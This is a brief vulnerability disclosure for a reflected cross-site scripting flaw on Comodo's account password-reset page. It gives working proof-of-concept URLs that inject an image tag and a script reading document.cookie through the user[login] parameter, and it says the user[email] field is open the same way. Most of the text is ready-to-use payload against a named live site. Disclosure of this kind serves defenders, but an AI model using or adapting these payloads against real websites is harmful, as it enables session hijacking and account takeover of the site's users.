Comodo.com still vulnerable to XSS
Vulnerable page: https://accounts.comodo.com/PoC
https://accounts.comodo.com/account/forget_password?user[login]="><img src=http://te-home.net/images/logo.png>https://accounts.comodo.com/account/forget_password?user[login]="><script>alert(document.cookie)</script>
You can either include any XSS code in login input box, or request any XSS code directly using GET method and user[login] parameter. Same goes for email input box, or user[email].
Note: This is a proof of concept and it doesn't reflect the views or interests of above websites.